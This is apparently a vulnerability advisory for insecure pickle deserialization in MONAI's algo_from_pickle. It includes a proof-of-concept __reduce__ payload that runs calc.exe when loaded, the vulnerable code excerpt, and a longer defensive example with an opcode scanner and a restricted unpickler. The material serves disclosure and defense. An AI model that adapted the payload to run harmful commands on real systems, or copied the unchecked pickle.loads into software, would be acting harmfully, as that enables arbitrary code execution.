PT-2026-33562 · Pypi · Monai

Published 2026-04-07 · Updated 2026-04-07

CVSS v3.1: 7.6 (High)

Vector: AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

Summary

The algo_from_pickle function in monai/auto3dseg/utils.py reads the supplied file and passes its contents straight to pickle.loads(data_bytes) without validating the input in any way. This is insecure deserialization of untrusted data and can lead to code execution.

Details

PoC

import pickle
import subprocess

class MaliciousAlgo:
    # __reduce__ tells pickle how to rebuild the object: call the returned
    # callable with the returned arguments, which happens during loading
    def __reduce__(self):
        return (subprocess.call, (["calc.exe"],))

malicious_algo_bytes = pickle.dumps(MaliciousAlgo())

# same dict layout that algo_from_pickle expects to find in the file
attack_data = {
    "algo_bytes": malicious_algo_bytes,
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
    f.write(pickle.dumps(attack_data))
Running the PoC writes the malicious file "attack_algo.pkl". Loading it through the vulnerable function:

from monai.auto3dseg.utils import algo_from_pickle

attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)

algo_from_pickle reads the file and hands its contents to pickle.loads, which rebuilds MaliciousAlgo by calling subprocess.call, so the embedded command executes.
Cause of the vulnerability (excerpt of monai/auto3dseg/utils.py):

import pickle
from typing import Any

from monai.config import PathLike

def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
    # the whole file is read and unpickled with no check on its origin or content
    with open(pkl_filename, "rb") as f_pi:
        data_bytes = f_pi.read()
    data = pickle.loads(data_bytes)
    # ... rest of the function, which later also unpickles data["algo_bytes"]

Impact

Arbitrary code execution
Repair suggestions

Verify the data source and content before deserializing, or use a safe deserialization method.
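The repair suggestion above, worked through as an added example (this is not MONAI code and not part of the advisory): a static opcode scan with pickletools that lists every global a pickle stream would import without executing anything, a restricted Unpickler whose find_class resolves only an allow-list, and a two-stage check that mirrors the way algo_from_pickle unpickles the outer dict and then its "algo_bytes" blob. SAFE_GLOBALS, NeedsGlobal, build_samples and the sample contents are constructed for the example; NeedsGlobal uses platform.node as a harmless stand-in in the position where the PoC names subprocess.call.

```python
from __future__ import annotations

import io
import pickle
import pickletools
import platform

# Only globals the loader may resolve (constructed allow-list for this example;
# a real deployment lists exactly the types its own serialized objects contain).
SAFE_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "bytes"), ("builtins", "str"), ("builtins", "int"),
    ("builtins", "float"),
}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) a pickle stream would import, found by walking its
    opcodes with pickletools.genops; nothing is executed, so this is safe on
    untrusted bytes. GLOBAL carries "module name" inline; STACK_GLOBAL takes
    the two most recently pushed strings, which may also come from the memo."""
    found: list[tuple[str, str]] = []
    strings: list[str] = []  # strings pushed onto the pickle stack
    memo: dict[int, str | None] = {}
    top: str | None = None   # last pushed value if it was a string
    memoize_index = 0        # MEMOIZE uses implicit increasing indices
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
            top = arg
            continue
        if op.name == "MEMOIZE":
            memo[memoize_index] = top
            memoize_index += 1
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = top
        elif op.name in ("GET", "BINGET", "LONG_BINGET") and memo.get(arg) is not None:
            strings.append(memo[arg])
            top = memo[arg]
            continue
        elif op.name == "GLOBAL":
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            attr, module = strings.pop(), strings.pop()
            found.append((module, attr))
        top = None
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses to resolve any global outside SAFE_GLOBALS, so a __reduce__
    payload fails before its callable is ever looked up."""

    def find_class(self, module: str, name: str):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_rejects(data: bytes) -> bool:
    """True when the restricted loader refuses the stream."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def load_verdict(data: bytes) -> str:
    """Static scan first, then the restricted loader; returns a short verdict."""
    try:
        unexpected = [g for g in referenced_globals(data) if g not in SAFE_GLOBALS]
    except ValueError:
        return "rejected: not a pickle stream"
    if unexpected:
        return "rejected: " + ", ".join(f"{m}.{n}" for m, n in unexpected)
    return "rejected: restricted loader" if restricted_rejects(data) else "loaded"


def check_algo_pickle(data: bytes) -> str:
    """Mirror algo_from_pickle's two-stage load: the outer dict, then the
    "algo_bytes" blob inside it, each checked before it is unpickled."""
    outer = load_verdict(data)
    if outer != "loaded":
        return "outer " + outer
    payload = safe_loads(data)
    inner = payload.get("algo_bytes", b"") if isinstance(payload, dict) else b""
    return "inner " + load_verdict(inner)


class NeedsGlobal:
    """Constructed stand-in for the advisory's MaliciousAlgo: __reduce__ names a
    callable for the loader to run; platform.node is harmless, the shape is the point."""

    def __reduce__(self):
        return (platform.node, ())


def build_samples() -> tuple[bytes, bytes]:
    """Constructed inputs shaped like the file algo_from_pickle reads: a benign
    data-only algo blob, and one whose algo_bytes carries the reduce payload."""
    benign = pickle.dumps({"algo_bytes": pickle.dumps({"template": "segresnet", "epochs": 3})})
    hostile = pickle.dumps({"algo_bytes": pickle.dumps(NeedsGlobal())})
    return benign, hostile


if __name__ == "__main__":
    for label, sample in zip(("benign", "hostile"), build_samples()):
        print(label, "->", check_algo_pickle(sample))
```

The outer file scans clean on its own: the payload lives inside the "algo_bytes" blob, which the scanner sees only as an opaque bytes argument, so a check that stops after the first pickle.loads passes it through. Every layer the loader will unpickle has to be checked, which is what check_algo_pickle does. An allow-list of plain data types also does not make pickle safe for arbitrary objects; where an Algo must round-trip, serializing its fields to a data-only format such as JSON is the safer deserialization method the advisory asks for.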

Fix

Weakness Enumeration

Deserialization of Untrusted Data

Related identifiers

GHSA-89GG-P5R5-Q6R4

Affected products

Monai